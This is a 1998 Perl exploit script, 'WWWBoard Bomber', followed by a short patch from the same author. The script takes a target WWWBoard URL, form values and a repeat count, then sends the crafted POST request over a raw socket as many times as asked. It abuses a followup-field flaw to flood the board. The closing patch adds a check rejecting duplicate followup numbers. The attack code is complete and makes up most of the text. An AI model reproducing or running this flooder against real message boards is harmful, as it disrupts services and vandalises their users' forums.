#!/usr/bin/perl
###################################################
#
# WWWBoard Bomber Exploit Script
# Written By: Samuel Sparling (sparling@slip.net)
#
# Written to exploit a flaw in the WWWBoard script
# by Matt Wright.
#
# Copyright © 1998 Samuel Sparling
# All Rights Reserved.
#
# Written 11-04-1998
###################################################
use Socket;# Tell perl to use the socket module

# Change this if the server you're trying on uses a different port for http
$port=80;

print "WWWBoard Bomber Exploit Script\n\n";
print "WWWBoard.pl URL: ";
$url=<STDIN>;
chop($url) if $url =~ /\n$/;

print "Name: ";
$name=<STDIN>;
chop($name) if $name =~ /\n$/;

print "E-Mail: ";
$email=<STDIN>;
chop($email) if $email =~ /\n$/;

print "Subject: ";
$subject=<STDIN>;
chop($subject) if $subject =~ /\n$/;

print "Message: ";
$message=<STDIN>;
chop($message) if $message =~ /\n$/;

print "Followup Value: ";
$followup=<STDIN>;
chop($followup) if $followup =~ /\n$/;

print "Times to Post: ";
$stop=<STDIN>;
chop($stop) if $stop =~ /\n$/;



	# Chop the URL into peices to use for the actual posting
	$remote = $url;
	$remote =~ s/http\:\/\///g;
	$remote =~ s/\/([^>]|\n)*//g;

	$path = $url;
	$path =~ s/http\:\/\///g;
	$path =~ s/$remote//g;


	$forminfo = "name=$name&email=$email&followup=$followup&subject=$subject&body=$message";
	$forminfo =~ s/\,/\%2C/g;# Turn comas into %2C so that they can be posted.
        $forminfo =~ tr/ /+/;

	$length = length($forminfo);

	$submit = "POST $path HTTP/1.0\r\nReferer: $url\r\nUser Agent: Mozilla/4.01 (Win95; I)\r\nContent-type: application/x-www-form-urlencoded\r\nContent-length: $length\r\n\r\n$forminfo\r\n";

	$i=0;
	while($i < $stop)
	{
		&post_message;
		$i++;
		print "$i message(s) posted.\n";
	}


sub post_message
{
		if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
		die("No port specified.") unless $port;
		$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
		$paddr = sockaddr_in($port, $iaddr);
		$proto = getprotobyname('tcp');
		socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
		connect(SOCK, $paddr) || die("Unable to connect: $!");
		send(SOCK,$submit,0);
		while(<SOCK>) {
			#print $_;# Uncomment for debugging if you have problems.
		}
		close(SOCK);
}


exit;



Below is the patch, all it does is check to make sure that the same followup number is not used more than once in the followups form field.

In the get_variables subroutine replace this:

   if ($FORM{'followup'}) {
      $followup = "1";
      @followup_num = split(/,/,$FORM{'followup'});
      $num_followups = @followups = @followup_num;
      $last_message = pop(@followups);
      $origdate = "$FORM{'origdate'}";
      $origname = "$FORM{'origname'}";
      $origsubject = "$FORM{'origsubject'}";
   }

with this:

   if ($FORM{'followup'}) {
      $followup = "1";
      @followup_num = split(/,/,$FORM{'followup'});
      $num_followups = @followups = @followup_num;
      $last_message = pop(@followups);
      $origdate = "$FORM{'origdate'}";
      $origname = "$FORM{'origname'}";
      $origsubject = "$FORM{'origsubject'}";

# WWWBoard Bomb Patch 
# Written By: Samuel Sparling (sparling@slip.net)
	$fn=0;
	while($fn < $num_followups)
	{
		$cur_fup = @followups[$fn];
		$dfn=0;
		foreach $fm(@followups)
		{
			if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
			{
				&error(board_bomb);
			}
			$dfn++;
		}
	$fn++;
	}
# End WWWBoard Bomb Patch
   }